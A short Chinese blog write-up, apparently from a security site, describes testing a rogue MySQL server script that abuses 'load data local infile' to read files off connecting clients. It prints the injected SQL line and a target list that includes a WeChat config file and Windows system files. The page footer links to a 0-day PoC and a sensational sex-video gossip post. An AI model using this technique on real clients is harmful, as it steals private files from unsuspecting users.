参考:
https://www.freebuf.com/articles/web/247976.html
https://www.colabug.com/2019/0408/5936906/
https://github.com/allyshka/Rogue-MySql-Server
阅读理解:
通过对正常连接mysql流程的抓包,构造在本地指点端口的监听,并伪造mysql与客户端的数据发包,从而诱导攻击者执行
load data local infile ‘/etc/passwd’ into table test fields terminated by ‘\n’;
测试:
执行rogue_mysql_server.py后,本地监听3306端口,

使用navicat工具对目标地址进行连接:

脚本中加载文件读取列表:
filelist = (
r’c:\boot.ini’,
r’c:\windows\win.ini’,
r’X:\My Documents\Documents\WeChat Files\All Users\config\config.data’,
r’C:\Windows\PFRO.log’,
)
由于不存在boot.ini 故报错;
此时查看目录下mysql.log文件内容,即为读取到的文件信息:

其中读取微信名文件为:
\WeChat Files\All Users\config\config.data

电脑文件名为:
C:\Windows\PFRO.log

.





![CVE-2019-12922:phpMyAdmin 0 Day漏洞[附PoC]-微慑信息网-VulSee.com](https://vulsee.com/wp-content/uploads/2019/09/beepress6-1568984516-220x150.jpeg)

![[八卦] 王婷婷—揭秘一个大三女生的性爱录像-微慑信息网-VulSee.com](http://free.86hy.com/crack/pic/1.jpg)
![[随笔]今天国际警察节-微慑信息网-VulSee.com](http://photo.sohu.com/20041017/Img222528326.jpg)

青云网
